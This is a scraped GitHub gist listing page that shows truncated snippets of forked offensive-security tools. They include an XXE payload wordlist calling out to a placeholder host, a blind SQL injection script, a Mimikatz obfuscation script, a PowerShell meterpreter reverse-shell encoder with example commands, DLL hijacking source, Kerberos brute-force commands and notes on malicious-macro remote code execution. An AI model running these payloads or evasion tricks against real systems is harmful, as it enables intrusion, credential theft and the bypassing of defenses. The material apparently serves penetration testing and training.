@NyaMeeEain
NyaMeeEain / filter_nessus_risks.py
Created December 19, 2020 04:50 — forked from 3lpsy/filter_nessus_risks.py
Filter out lower risk vulns in .nessus file
import sys
import argparse
from pathlib import Path
import lxml.etree as et
def run_filter(file, risks):
    # sys.argv always contains the script name, so require at least one real argument
    if len(sys.argv) < 2:
        print("usage: [script].py nessusfile.nessus")
        sys.exit(1)
@NyaMeeEain
NyaMeeEain / xxe-payloads.txt
Created December 19, 2020 04:46 — forked from 3lpsy/xxe-payloads.txt
XXE bruteforce wordlist
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x SYSTEM "http://xxe-doctype-system.yourdomain[.]com/"><x />
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x PUBLIC "" "http://xxe-doctype-public.yourdomain[.]com/"><x />
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe SYSTEM "http://xxe-entity-system.yourdomain[.]com/">]><x>&xxe;</x>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe PUBLIC "" "http://xxe-entity-public.yourdomain[.]com/">]><x>&xxe;</x>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe SYSTEM "http://xxe-paramentity-system.yourdomain[.]com/">%xxe;]><x/>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe PUBLIC "" "http://xxe-paramentity-public.yourdomain[.]com/">%xxe;]><x/>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><x xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://xxe-xsi-schemalocation.y
@NyaMeeEain
NyaMeeEain / blind.py
Created December 19, 2020 04:44 — forked from 3lpsy/blind.py
Scuffed Blind SQL Injection for Burp's Web Sec Academy
import requests
from pathlib import Path
from urllib.parse import quote
import argparse
from string import ascii_lowercase
import os
from urllib3.exceptions import InsecureRequestWarning
# This is actually a pretty bad implementation. I wrote it in about an hour.
#!/bin/bash
if [[ $# -le 1 ]] ; then
    echo './obfuscate-mimikatz.sh Invoke-Mimikatz.ps1 newfile.ps1'
    exit 1
fi
randstr(){< /dev/urandom tr -dc a-zA-Z0-9 | head -c${1:-8};}
# Quote the paths so file names containing spaces are copied correctly
cp "$1" "$2"
@NyaMeeEain
NyaMeeEain / ps1encode.py
Created August 5, 2020 02:57 — forked from FrankSpierings/ps1encode.py
Encoder like TrustedSec Unicorn, to allow x64 payloads - I don't like to migrate.
#!/usr/bin/env python2
#
# Example: python2 ps1encoder.py 10.0.0.1 4444 -p windows/x64/meterpreter/reverse_tcp -b > engage.bat
# Example: python2 ps1encoder.py 10.0.0.1 4444 -p windows/x64/meterpreter/reverse_tcp > engage.ps1
import random
import string
import argparse
import base64
import codecs
@NyaMeeEain
NyaMeeEain / main.cpp
Created May 30, 2020 02:23 — forked from monoxgas/main.cpp
Adaptive DLL Hijacking - Patching LoadLibrary Return
#include <Windows.h>
#include <intrin.h>
#include <string>
#include <TlHelp32.h>
#include <psapi.h>
BOOL PatchTheRet(HMODULE realModule) {
// Get primary module info
@NyaMeeEain
NyaMeeEain / kerberos_attacks_cheatsheet.md
Created March 18, 2020 01:17 — forked from TarlogicSecurity/kerberos_attacks_cheatsheet.md
A cheatsheet with commands that can be used to perform kerberos attacks

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

@NyaMeeEain
NyaMeeEain / Various-Macro-Based-RCEs.md
Created January 29, 2019 09:35 — forked from mgeeky/Various-Macro-Based-RCEs.md
Various Visual Basic Macros-based Remote Code Execution techniques to get your meterpreter invoked on the infected machine.

This is a note for myself describing various Visual Basic macro construction strategies that could be used for remote code execution via a malicious document vector. Nothing new or fancy here, just a list of techniques, tools and scripts collected in one place for a quick glimpse of an eye before setting a payload.

All of the examples below were generated using 192.168.56.101 as the remote address.

List:

  1. Page substitution macro for luring the user to click Enable Content
  2. The Unicorn PowerShell-based payload